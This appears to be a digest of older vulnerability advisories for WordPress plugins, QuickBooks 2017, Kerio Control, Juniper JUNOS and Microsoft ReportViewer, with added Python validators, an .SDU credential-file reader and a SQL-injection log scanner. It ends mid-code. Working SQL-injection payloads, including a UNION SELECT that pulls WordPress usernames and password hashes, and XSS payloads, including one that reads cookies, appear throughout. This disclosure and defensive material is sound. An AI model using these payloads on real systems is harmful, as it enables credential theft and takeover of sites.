[CVE-2019-12516] SlickQuiz for Wordpress 1.3.7.1 "/wp-admin/admin.php?page=slickquiz-*" Multiple Authenticated SQL Injections

2019-09-10
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
===
Product:        SlickQuiz
Vendor URL:     https://wordpress.org/plugins/slickquiz/
Type:           SQL Injection [CWE-74]
Date found:     2019-05-30
Date published: 2019-09-10
CVSSv3 Score:   8.1 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
CVE:            CVE-2019-12516


2. CREDITS
==
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED

SlickQuiz for Wordpress 1.3.7.1 (latest)


4. INTRODUCTION
===
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.

(from the vendor's homepage)


5. VULNERABILITY DETAILS

The SlickQuiz Wordpress plugin is vulnerable to multiple authenticated SQL
injections wherever the "id" parameter is used. No quiz needs to exist: the
mere presence of the plugin makes the installation vulnerable.

Since every access level from Subscriber (the lowest possible rights) up to
Admin has access to the plugin, privileges can be escalated quite easily.

To name just a few vulnerable endpoints:

/wp-admin/admin.php?page=slickquiz-scores=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-edit=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-preview=(select*from(select(sleep(5)))a)


6. RISK
===
The vulnerability can be used by an authenticated attacker (the lowest possible
rights of Subscriber are sufficient) to read sensitive contents from the backend
database and therefore compromise all kinds of information stored in the
database. This could be sensitive authentication information like passwords,
or customer and employee information like email addresses, and it could also be
used to escalate privileges to Admin, which in turn leads to RCE on the
Wordpress installation via the plugin functionality.


7. SOLUTION
===
None (Remove the plugin)


8. REPORT TIMELINE
==
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12516
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor
2019-09-10: Public disclosure.


9. REFERENCES
=
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/


[CVE-2019-12517] SlickQuiz for Wordpress 1.3.7.1 "/wp-admin/admin.php?page=slickquiz" Multiple Stored XSS

2019-09-10
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
===
Product:        SlickQuiz
Vendor URL:     https://wordpress.org/plugins/slickquiz/
Type:           Cross-Site Scripting [CWE-79]
Date found:     2019-05-30
Date published: 2019-09-10
CVSSv3 Score:   6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
CVE:            CVE-2019-12517


2. CREDITS
==
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED

SlickQuiz for Wordpress 1.3.7.1 (latest)


4. INTRODUCTION
===
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.

(from the vendor's homepage)


5. VULNERABILITY DETAILS

The "save_quiz_score" functionality available to unauthenticated users via the
Wordpress "/wp-admin/admin-ajax.php" endpoint allows unauthenticated users to
submit quiz solutions/answers. If the configuration option "Save user scores"
is enabled (disabled by default), the response is stored in the database and
later shown in the Wordpress backend for all users with at least Subscriber
rights.

However, since the plugin does not properly validate and sanitize the quiz
response, a malicious XSS payload in either the name, the email or the score
parameter like:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
DNT: 1
Connection: close

action=save_quiz_score={"name":"Naalert(document.domain)
me","email":"info@localalert(document.domain)host",
"score":"alert(document.domain)","quiz_id":1}

is executed directly within the backend at "/wp-admin/admin.php?page=slickquiz"
across all users with the privileges of at least subscriber and up to admin.


6. RISK
===
To successfully exploit this vulnerability an authenticated user must be tricked
into visiting the SlickQuiz administrative backend on the affected Wordpress
installation.

The vulnerability can be used to permanently embed arbitrary script code into
the administrative Wordpress backend, which offers a wide range of possible
attacks such as redirecting the user to a malicious page, spoofing content on
the page or attacking the browser and its plugins.


7. SOLUTION
===
None (Remove the plugin)


8. REPORT TIMELINE
==
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12517
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor.
2019-09-10: Public disclosure.


9. REFERENCES
=
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
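Added example, not the plugin's code (and written in Python rather than the plugin's PHP): a strict validator for a save_quiz_score submission with the fields the advisory shows (name, email, score, quiz_id), plus output-side HTML escaping so that whatever reaches the database cannot execute when the scores page is rendered. The length limits and character classes are an assumed policy chosen for the example, and both request bodies below are constructed.

```python
import html
import json
import re

# Constructed inputs, not captured traffic: the same field layout as the
# advisory's JSON, one benign and one carrying a script payload in "name".
BENIGN = '{"name":"Jane","email":"jane@example.org","score":"7","quiz_id":1}'
MALICIOUS = ('{"name":"Na<script>alert(document.domain)</script>me",'
             '"email":"info@localhost","score":"7","quiz_id":1}')

NAME_RE = re.compile(r"^[\w .'-]{1,64}$")                                   # assumed policy
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")  # assumed policy


class InvalidSubmission(ValueError):
    """Raised for any submission that does not match the expected shape."""


def validate_submission(raw: str) -> dict:
    """Parse the JSON body and enforce type, length and character rules per field."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise InvalidSubmission(f"not JSON: {exc}") from None
    if not isinstance(data, dict):
        raise InvalidSubmission("payload must be a JSON object")

    name, email, score, quiz_id = (data.get(k) for k in ("name", "email", "score", "quiz_id"))
    if not isinstance(name, str) or not NAME_RE.fullmatch(name):
        raise InvalidSubmission("name contains disallowed characters or is too long")
    if not isinstance(email, str) or len(email) > 254 or not EMAIL_RE.fullmatch(email):
        raise InvalidSubmission("email is not a plain address")
    # The plugin accepts the score as a string; only a short run of digits is allowed.
    if isinstance(score, bool) or not re.fullmatch(r"\d{1,5}", str(score)):
        raise InvalidSubmission("score must be a small non-negative integer")
    if isinstance(quiz_id, bool) or not isinstance(quiz_id, int) or quiz_id <= 0:
        raise InvalidSubmission("quiz_id must be a positive integer")
    return {"name": name, "email": email, "score": int(score), "quiz_id": quiz_id}


def render_score_row(record: dict) -> str:
    """Escape every field at output time, independent of what validation did on input."""
    cells = (record["name"], record["email"], record["score"], record["quiz_id"])
    return "<tr>" + "".join(f"<td>{html.escape(str(c), quote=True)}</td>" for c in cells) + "</tr>"


def process_submission(raw: str):
    """Return (accepted, html_row_or_reason) for one request body."""
    try:
        record = validate_submission(raw)
    except InvalidSubmission as exc:
        return False, str(exc)
    return True, render_score_row(record)


if __name__ == "__main__":
    for body in (BENIGN, MALICIOUS):
        print(process_submission(body))
```

The two layers are deliberately independent: the input rules reject the advisory's payload outright, and the escaping in render_score_row means that a record written by an older, unvalidated version of the plugin still renders as text.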

QuickBooks 2017 Admin Credentials Disclosure

2017-01-06
+ Credits: Maxim Tomashevich
+ Website: https://www.thegrideon.com/quickbooks-forensics.html
+ Details: https://www.thegrideon.com/qb-internals-2017.html


Vendor:
-
www.intuit.com
www.intuit.ca


Product:
-
QuickBooks Desktop
versions: 2017


Vulnerability Type:
-
Admin Credentials Disclosure


Vulnerability Details:
-
Unattended access is the major security risk in the QuickBooks Integrated
Applications infrastructure: user credentials must be stored in order to grant
an application unattended access to the database content.

In QuickBooks 2017, .SDU files are used to store Apps, access rights and login
details for QBW files. These .SDU files are stored in one location:
"C:\Users\\Intuit\QuickBooks\\.sdu".
In contrast to prior versions, in QuickBooks 2017 the .sdu files are easy to
locate, and an App named "ScheduledReports" is added to the .QBW/.SDU records
with full Admin data access rights on every .QBW startup! This makes the
situation considerably worse overall. As of the 2017 R4 update there is no way
to permanently remove or disable it.

.SDU file format is very simple:
DWORD   dDataSize;
BYTE bEncryptedData[dDataSize];

Data is decrypted with Windows API CryptUnprotectData and 22 bytes constant 
BYTE OptionalEntropy[22] = {0xA2, 0x48, 0x2E, 0x45, 0x12, 0x9B, 0xC7, 0xAB, 
0xE2, 0xAB, 0xC6, 0x63, 0xCA, 0x76, 0xDD, 0xE0, 0x70, 0xB4, 0x84, 0x11, 0x6, 0};

The decrypted data contains two blocks:
a 180-byte BASE64-encoded digital signature of the data,
and a BASE64-encoded set of App records such as:

appname=ScheduledReports=0=07%2F05%2F2018=VeriSign%20Class%203%20Code%20Signing%202010%20CA=233AA6FE50417400BE428D60CF54264B=0=Intuit%2C%20Inc.;Admin;XX..XX

, where XX..XX is the 21-byte Admin password hash used as the SQL Anywhere
engine password, as the base for sensitive data decryption, etc.

Thus in QuickBooks 2017 US or CA (up to R4 so far), database "Admin" level
credentials are available by default to anybody with the current Windows login
details, for all QBW files created.
Because .sdu files are stored at a fixed location, they can also be used to
collect login credentials for remote access to the QB database with the
simplest malicious script/code.

Severity Level:
-
High


Disclaimer:
-
Permission is hereby granted for the redistribution of this text, provided that 
it is not altered except by reformatting, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.
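Added example, not Intuit's code and not the advisory author's tooling: a Python reader for the .SDU layout described above. It parses the DWORD-length container, splits the 180-byte BASE64 signature block from the BASE64 App records, and reports which Apps hold credentials for the "Admin" user, which is the audit a defender wants to run on a workstation. The DPAPI step calls CryptUnprotectData with the published entropy through ctypes and only runs on Windows; the newline separator between records and the meaning of the fields after appname are assumptions, and the sample container is constructed plaintext so the parsing runs offline.

```python
import base64
import ctypes
import struct
import sys
from urllib.parse import unquote

# 22-byte OptionalEntropy as published in the advisory.
OPTIONAL_ENTROPY = bytes([0xA2, 0x48, 0x2E, 0x45, 0x12, 0x9B, 0xC7, 0xAB,
                          0xE2, 0xAB, 0xC6, 0x63, 0xCA, 0x76, 0xDD, 0xE0,
                          0x70, 0xB4, 0x84, 0x11, 0x06, 0x00])
SIGNATURE_B64_LEN = 180   # leading BASE64 signature block, per the advisory


def parse_sdu_container(blob: bytes) -> bytes:
    """Split 'DWORD dDataSize; BYTE bEncryptedData[dDataSize]' and return the payload."""
    if len(blob) < 4:
        raise ValueError("file too short for the DWORD header")
    (size,) = struct.unpack_from("<I", blob, 0)
    if 4 + size > len(blob):
        raise ValueError(f"header claims {size} bytes but only {len(blob) - 4} follow")
    return blob[4:4 + size]


class _DataBlob(ctypes.Structure):
    _fields_ = [("cbData", ctypes.c_uint32), ("pbData", ctypes.POINTER(ctypes.c_char))]


def dpapi_unprotect(encrypted: bytes, entropy: bytes = OPTIONAL_ENTROPY) -> bytes:
    """CryptUnprotectData with the fixed entropy; Windows only, current user's DPAPI keys."""
    if sys.platform != "win32":
        raise OSError("DPAPI is only available on Windows")
    buf_in = ctypes.create_string_buffer(encrypted, len(encrypted))
    buf_ent = ctypes.create_string_buffer(entropy, len(entropy))
    blob_in = _DataBlob(len(encrypted), ctypes.cast(buf_in, ctypes.POINTER(ctypes.c_char)))
    blob_ent = _DataBlob(len(entropy), ctypes.cast(buf_ent, ctypes.POINTER(ctypes.c_char)))
    blob_out = _DataBlob()
    ok = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blob_in), None, ctypes.byref(blob_ent), None, None, 0, ctypes.byref(blob_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(blob_out.pbData, blob_out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(blob_out.pbData)


def split_decrypted(decrypted: bytes):
    """Return (signature bytes, app-record text) from the decrypted payload."""
    signature = base64.b64decode(decrypted[:SIGNATURE_B64_LEN])
    records = base64.b64decode(decrypted[SIGNATURE_B64_LEN:]).decode("latin-1")
    return signature, records


def parse_app_records(text: str) -> list:
    """Parse 'appname=<name>=<fields...>;<user>;<21-byte hash>' records (newline-separated: assumption)."""
    apps = []
    for line in text.split("\n"):
        if not line.strip():
            continue
        app_part, _, rest = line.partition(";")
        user, _, secret = rest.partition(";")
        fields = [unquote(f) for f in app_part.split("=")]
        if len(fields) < 2 or fields[0] != "appname":
            raise ValueError(f"unrecognised record: {line[:40]!r}")
        # The hash is never returned or printed; only its length is kept as a sanity check.
        apps.append({"app": fields[1], "fields": fields[2:], "user": user, "secret_len": len(secret)})
    return apps


def admin_apps(apps: list) -> list:
    """Names of Apps holding credentials for the Admin user, i.e. unattended full access."""
    return [a["app"] for a in apps if a["user"].lower() == "admin"]


def inspect_sdu(blob: bytes, decrypt=dpapi_unprotect) -> list:
    """Container -> decrypt -> records. 'decrypt' is injectable so the parser runs offline."""
    _signature, text = split_decrypted(decrypt(parse_sdu_container(blob)))
    return parse_app_records(text)


def build_sample_sdu() -> bytes:
    """Constructed stand-in: plaintext payload with a zeroed signature (not real QuickBooks data)."""
    rec1 = ("appname=ScheduledReports=0=07%2F05%2F2018=VeriSign%20Class%203%20Code%20Signing%202010%20CA"
            "=233AA6FE50417400BE428D60CF54264B=0=Intuit%2C%20Inc.;Admin;" + "X" * 21)
    rec2 = "appname=ExampleSync=0=01%2F01%2F2019=Example%20CA=0=0=Example%20Ltd;reportuser;" + "Y" * 21
    payload = base64.b64encode(b"\x00" * 135) + base64.b64encode((rec1 + "\n" + rec2).encode("latin-1"))
    return struct.pack("<I", len(payload)) + payload


if __name__ == "__main__":
    found = inspect_sdu(build_sample_sdu(), decrypt=lambda data: data)
    print("Apps with Admin credentials:", admin_apps(found))
```

On a real workstation the call is inspect_sdu(open(path, "rb").read()) under the user's own session, since DPAPI only unprotects in that context; the point of the audit is the list returned by admin_apps, which on 2017 R4 and earlier will always include ScheduledReports.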


Logic security flaw in TP-LINK - tplinklogin.net

2016-07-01
TP-LINK forgot to buy the domain www.tplinklogin.net, which is being used to
configure much of the hardware they have, like router configuration.

The domain is available to buy via an escrow service, so a potential attacker
can get it; it's all about money.

There is an unknown holder who has the domain right now, and it has been
confirmed to be outside the company.

As for now, the company decided to make minor fixes. Yet they don't like to
buy the domain from the unknown seller, for now.

I've contacted the Chinese CERT, the US-CERT, the Israeli CERT and the company.

The logic behind using a domain in the first place, instead of an IP address,
is the main problem here; forgetting to buy the domain is the second mistake.

While checking how many users are trying to use it, I've realized that this
is affecting plenty of people.

My advice is for the ISPs to block the domain.

It seems that some people understood that the service is not good and
complained about it online; however I didn't see a publication concerning the
security effect of the issue.

I hope this mistake won't happen again.

Amitay Dan
CEO at Cybermoon 

for more info please follow
www.cybermoon.cc
www.amitaydan.com

@popshark1


[Call For Papers] RiseCON - Rosario, Argentina

2014-08-20
RiseCON - Rosario Information Security Conference 2014
www.risecon.org
Dates: 6 and 7 November 2014
Venue: Plataforma Lavarden (Av Mendoza 1085) - Rosario, Santa Fe, Argentina


RiseCON is the first and largest information security and hacking event held
in the city of Rosario, with an international level and reach.


For the 1st edition of RiseCON we invite everyone interested in presenting
their research, work and/or developments in the field of information security.


Talks may be submitted until 15 September (inclusive) to c...@risecon.org,
attaching a document with the following information:


- Presentation title
- Author
- Estimated duration (maximum 45 minutes)
- Topic
- Talk abstract (maximum 3000 words)
- Does it include a live demo?
- Will a new tool be presented?
- Will a new exploit be presented?
- Has the talk been presented before at another conference?
- Contact telephone (landline and mobile)


Topics of interest (but not limited to these) for talks, trainings (paid) and
workshops (free) are the following:


- Cloud Security
- Honeypots/Honeynets
- Forensics & Anti-Forensics
- Network Devices and Router Hacking
- Bitcoin Security
- Software Testing/Fuzzing
- WLAN / Bluetooth & VoIP Security
- RFID, Bluetooth and NFC
- Social Engineering / “Layer 8”
- Hacking Virtualized Environments
- Lockpicking & Physical Security
- Open Source Security & Hacking Tools
- Web Application Security & Hacking
- Malware Analysis & Reverse Engineering
- New Vulnerabilities / Exploits / 0-days
- Advanced Penetration Testing Techniques
- Antivirus/Firewall/UTM Evasion Techniques
- Electronics & Microcontrollers - Arduino, ARM, RaspberryPi and similar
- Cybercrime
- Mobile Application Security - Threats and Exploits
- Mobile Communications (GPRS/GSM/3G/4G/HSDPA etc)
- Critical Infrastructure & SCADA Networks Security


* Priority will be given to presentations that include live demos.


- Important dates -
- 15 September - Paper submission deadline
- 6 November - RiseCON paid Trainings and free Workshops
- 7 November - RiseCON Talks (free admission)


Kerio Control <= 8.3.1 Boolean-based blind SQL Injection

2014-07-01
Document Title:
==
Kerio Control <= 8.3.1 Boolean-based blind SQL Injection

Primary Information:
==

Product Name: Kerio Control
Software Description: Kerio Control brings together multiple capabilities
including a network firewall and router, intrusion detection and prevention
(IPS), gateway anti-virus, VPN and content filtering. These comprehensive
capabilities and unmatched deployment flexibility make Kerio Control the ideal
choice for small and mid-sized businesses.
Affected Version: Latest Version - 8.3.1 (released on 2014-05-20)
Vendor Website: http://kerio.com
Vulnerability Type: Boolean-based blind SQL Injection
Severity Level: Very High
Exploitation Technique: Remote
CVE-ID: CVE-2014-3857
Discovered By: Khashayar Fereidani
Main Reference:
http://fereidani.com/articles/show/76_kerio_control_8_3_1_boolean_based_blind_sql_injection
Researcher's Websites: http://fereidani.com http://fereidani.ir
http://und3rfl0w.com http://ircrash.com
Researcher's Email: info [ a t ] fereidani [ d o t ] com


Technical Details:
===

Kerio Control suffers from a SQL injection vulnerability which can lead to the
disclosure of users' sensitive information such as passwords. To use this
vulnerability an attacker needs a valid client username and password.

Vulnerable path: /print.php
Vulnerable variables: x_16 and x_17
HTTP Method: GET

Proof Of Concept:
===

Blind Test:
 TRUE:  https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=1&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=&x_2l
 FALSE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=2&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=&x_2l
 

Solution:

Escape the variables properly, or type-check them as integers.


Exploit:

Private


Vulnerability Disclosure Timeline:
==
May 30 2014 - Disclosure 
May 31 2014 - Received a CVE ID
May 31 2014 - Initial Report to Kerio Security Team
June 3 2014 - Support team replied fix is planned to be included in a future 
release
June 30 2014 - Patched
July 1 2014 - Publication


   Khashayar Fereidani - 
http://fereidani.com



Wordpress Booking System (Booking Calendar) plugin SQL Injection

2014-05-21
# Exploit Title: Wordpress Booking System (Booking Calendar) plugin SQL Injection
# Release Date: 2014-05-21
# Author: maodun
# Contact: Twitter: @conmancm
# Software Link: http://wordpress.org/support/plugin/booking-system
# Affected version:  1.3
# Google Dork: inurl:/wp-content/plugins/booking-system/
# REF:CVE-2014-3210
-
# Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.
-
# SQLi - Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php

vulnerable parameter: $_POST['booking_form_id']

POC:

POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 149
Cookie: [your cookie]

action=dopbs_show_booking_form_fields&booking_form_id=100 union select
1,2,3,4,5,6,7,8,9,hex(concat(user_login,user_pass)) from
wp_users#&language=cr

response:
<input type="hidden" name="booking-form-field-translation-1"
id="booking-form-field-translation-1" value="[hex value here]" />

-
# Patch:
-- Vendor was notified on the 2014-05-05
-- Vendor released version 1.3 on 2014-05-06 Fixed the bug
-
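Added example, not from any of the advisory authors in this digest: a Python scan over constructed web-server log lines that flags the three injection styles seen above, the time-based sleep() in SlickQuiz, the boolean AND 1=1 / AND 1=2 pair in Kerio Control, and the UNION SELECT in the Booking System plugin, and separately flags any non-integer value sent to a parameter the application treats as a numeric id, which is the type check the Kerio advisory recommends. The log format, the allow-list of integer parameters and the "id" parameter name for SlickQuiz are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters the affected applications treat as integers (assumed names taken
# from the advisories: SlickQuiz "id", Kerio "x_16"/"x_17", Booking "booking_form_id").
INTEGER_PARAMS = {"id", "x_16", "x_17", "booking_form_id"}
NON_INTEGER = "non-integer value for integer parameter"

# One indicator per injection style shown in this digest.
INDICATORS = {
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean-based": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Constructed log format (assumption): ts ip method url status ["form body"].
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<url>\S+) '
                    r'(?P<status>\d{3})(?: "(?P<body>.*)")?$')

# Constructed sample lines, not captured traffic.
SAMPLE_LOG = [
    '2019-09-10T10:00:01Z 203.0.113.5 GET /wp-admin/admin.php?page=slickquiz-scores&id=(select*from(select(sleep(5)))a) 200',
    '2014-05-30T09:12:44Z 198.51.100.7 GET /print.php?x_w=overall&x_16=16221%20AND%201%3D1&x_17=16221 200',
    '2014-05-30T09:12:45Z 198.51.100.7 GET /print.php?x_w=overall&x_16=16221%20AND%201%3D2&x_17=16221 200',
    '2014-05-21T08:00:00Z 192.0.2.9 POST /wp/wp-admin/admin-ajax.php 200 '
    '"action=dopbs_show_booking_form_fields&booking_form_id=100+union+select+1,2,3&language=cr"',
    '2019-09-10T10:05:00Z 203.0.113.10 GET /wp-admin/admin.php?page=slickquiz-scores&id=42 200',
]


def extract_params(url: str, body):
    """All query-string and form parameters, percent-decoded once by parse_qsl."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if body:
        params += parse_qsl(body, keep_blank_values=True)
    return params


def classify_value(value: str):
    """Indicator names matching the value; decoded a second time to catch double encoding."""
    decoded = unquote_plus(value)
    return [kind for kind, rx in INDICATORS.items() if rx.search(decoded)]


def scan_params(params):
    """Return (parameter, finding) pairs for one request."""
    findings = []
    for name, value in params:
        kinds = classify_value(value)
        if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value.strip()):
            kinds.append(NON_INTEGER)
        findings.extend((name, kind) for kind in kinds)
    return findings


def scan_log(lines):
    """Parse each line and keep only requests that produced at least one finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # unparseable lines are skipped rather than treated as clean
        findings = scan_params(extract_params(m["url"], m["body"]))
        if findings:
            hits.append({"ip": m["ip"], "method": m["method"], "url": m["url"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["url"], hit["findings"])
```

The integer-parameter rule is the more durable of the two checks: keyword indicators can be evaded with encoding and comment tricks, whereas a value that is not a run of digits on a parameter that is only ever a row id is wrong regardless of what it contains. The same rule, applied server-side before the query is built, is the fix the Kerio advisory asks for.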


XSS on Juniper JUNOS 11.4 Embedthis Appweb 3.2.3

2013-11-11
Vulnerability Type: (XSS) Cross-Site Scripting

- Original release date: November 11th, 2013
- Last revised: November 11th, 2013
- Discovered by: Andrea Bodei - A2SECURE
- Severity: 4.3/10 (CVSSv2 Base Scored)

Products and affected versions:
JUNOS up to 11.4 (probably 12.1 and 12.3 vulnerable)

Vulnerability Discovered by: Andrea Bodei - i...@andreabodei.com
Company: A2SECURE - España
A2Secure Website: http://www.A2secure.com
Vendor Website: http://www.juniper.net
Application Website: http://freecode.com/projects/appweb



==
Background
==

Juniper Networks, Inc. is an American manufacturer of networking equipment 
founded in 1996 by Mark Burke. It is headquartered in Sunnyvale, California, 
USA. The company designs and sells high-performance Internet Protocol network 
products and services. Juniper's main products include T-series, M-series, 
E-series, MX-series, and J-series families of routers, EX-series Ethernet 
switches and SRX-series security products. Junos, Juniper's own network 
operating system, runs on most Juniper products.



==
Vulnerability Details
==

JUNOS versions 11.4 and 12.1 can be managed by a web login on HTTPS port 443
through the EmbedThis AppWeb web server 3.2.3, which is prone to a cross-site
scripting (XSS) vulnerability in the index.php error parameter due to
insufficient sanitising of special characters, which allows arbitrary scripts
to be executed in the context of the user's browser.
This vulnerability could be exploited to manipulate a client session, steal
tokens, steal credentials, execute administrative tasks, impersonate a
legitimate user, perform transactions as that user, or for phishing.
Juniper should upgrade its OS to the latest release of EmbedThis (4.4.1 or
better) and implement special-character filtering.




==
Proof Of Concepts
==

These URLs just pop up a custom number/letter/word/phrase:

https://xxx.xxx.xxx.xxx/index.php?name=Your_Account&error=1%22%3E%3Cscript%3Ealert%281538%29%3C%2Fscript%3E&uname=bGF

https://xxx.xxx.xxx.xxx/index.php?name=Your_Account&error=1%22%3E%3Cscript%3Ealert%28HACKED%29%3C%2Fscript%3E&uname=bGF



==
Credits/Author
==

Andrea Bodei
A2Secure.com



==
Disclaimer
==

All information is provided without warranty. The intent is to provide 
information to secure infrastructure and/or systems, not to be able to attack 
or damage. Therefore A2Secure shall not be liable for any direct or indirect 
damages that might be caused by using this information.


AthCon 2013 Rev. Challenge 2013

2013-03-11
The Reverse Engineering challenge is now available. The rules are included in 
the associated zip file. All submissions should be sent to kyre...@athcon.org 
and the deadline is 30/04/2013. 

Download Rev. Challenge 2013:http://www.athcon.org/AthCon_2013_RE_Challenge.zip 
Challenge Creator: Kyriakos Economou & Nikolaos Tsapakis


Re: Ilient SysAid v8.5.05 - Multiple Web Vulnerabilities Are Fixed!

2012-04-11
Thanks for the feedback! All of SysAid's web vulnerabilities are fixed. SysAid 
has already come out with a new release 8.5.08 that addresses all of these 
security issues—making SysAid 8.5.08 highly secure.  We are sorry for the 
inconvenience, and encourage all our users to upgrade to the most recent 
version of SysAid here: http://www.ilient.com/release-upgrades.htm.


Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls

2011-08-25
==
Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls 
Adam Bixby - Gotham Digital Science (l...@gdssecurity.com) 
Public Release Date: 8/9/2011
Confirmed Affected Software:  Microsoft Report Viewer Redistributable 2005 SP1 
and Microsoft Visual Studio 2005 Service Pack 1
Browser used for testing: IE8 (8.0.7601.17514)
Severity: High
MS Bulletin: MS11-067 - 
http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx
CVE: CVE-2011-1976

==
1. Summary
==
The Microsoft ReportViewer Controls are a freely redistributable control that 
enables embedding reports in applications developed using the .NET Framework.  
A Cross-Site Scripting (XSS) vulnerability was found in the 
Microsoft.ReportViewer.WebForms.dll.  The XSS vulnerability appears to affect 
all websites that utilize the affected controls.

==
2. Technical Details
==
File: Microsoft.ReportViewer.WebForms.dll (PerformOperation() method of the
SessionKeepAliveOperation class)
1) User-controllable data enters via the TimerMethod URL parameter value and
is assigned to the andEnsureParam string variable.

string andEnsureParam = HandlerOperation.GetAndEnsureParam(urlQuery, TimerMethod);

2) The andEnsureParam variable with user-controllable input is then passed
into the s string variable, which is dynamically building a JavaScript block.
The s variable is then passed to response.Write(). Writing the unvalidated
data into the JS block creates the XSS exposure.

string s = string.Format(CultureInfo.InvariantCulture,
    "<html><body><script type=\"text/javascript\">parent.{0}();</script></body></html>",
    new object[] { andEnsureParam });
response.Write(s);

==
3. Proof-of-Concept Exploit
==
This vulnerability can be exploited against websites that have deployed the 
vulnerable Microsoft.ReportViewer.WebForms.dll.  You will note that since the 
data is being written into an existing Javascript block that the attacker does 
not need to include any opening or closing tags (i.e.,img, script, etc) to 
execute code.

Reproduction Request:
https://test.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=<arbitraryIDvalue>&ControlID=<validControlID>&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed=

(Note: During testing of this issue, it appeared as though a valid ControlID
parameter value was needed to exploit this issue)

==
4. Recommendation
==
Update to the latest versions.  For more information please see 
http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx

==
5. About Gotham Digital Science
==
Gotham Digital Science (GDS) is an information security consulting firm that 
works with clients to identify, prevent, and manage security risks. For more 
information on GDS, please contact i...@gdssecurity.com or visit 
http://www.gdssecurity.com.
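Added example, a Python rendition rather than the control's C#: the right fix for a parameter that lands inside a script block is not HTML encoding but an allow-list check that TimerMethod is a bare JavaScript identifier before it is formatted into parent.{0}();. The vulnerable and hardened renderers below share the page's template; the identifier value and the attack value are constructed from the request shown above, and the 128-character limit is an assumption.

```python
import re
from urllib.parse import parse_qs

# Only a bare identifier may be formatted into "parent.{0}();".
JS_IDENTIFIER = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*$")
KEEPALIVE_TEMPLATE = ('<html><body><script type="text/javascript">'
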